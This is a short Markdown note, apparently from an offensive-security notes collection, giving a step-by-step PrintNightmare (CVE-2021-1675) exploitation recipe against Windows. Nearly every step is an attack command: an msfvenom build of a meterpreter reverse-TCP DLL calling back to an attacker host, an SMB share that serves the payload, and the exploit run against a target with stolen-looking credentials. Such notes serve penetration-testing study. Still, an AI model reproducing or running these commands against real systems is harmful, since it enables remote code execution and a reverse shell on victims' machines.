killchain-compendium/exploit/windows/docs/printnightmare.md

28 lines
548 B
Markdown

# Print Nightmare
* Clone [cube0x0's exploits](https://github.com/cube0x0/CVE-2021-1675.git)
* Create virtual env inside cloned repo and install impacket
```sh
pip install .
pip2 install .
```
* Create payload
```sh
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f dll -o giftcard.dll
```
* Prepare msf multi handler
* Inside virtualenv
```sh
smbserver share $(pwd) -smb2support
```
* Roll the exploit
```sh
python CVE-2021-1675.py GROUP/username:'password'@$TARGET_IP '\\$ATTACKER_IP\share\giftcard.dll'
```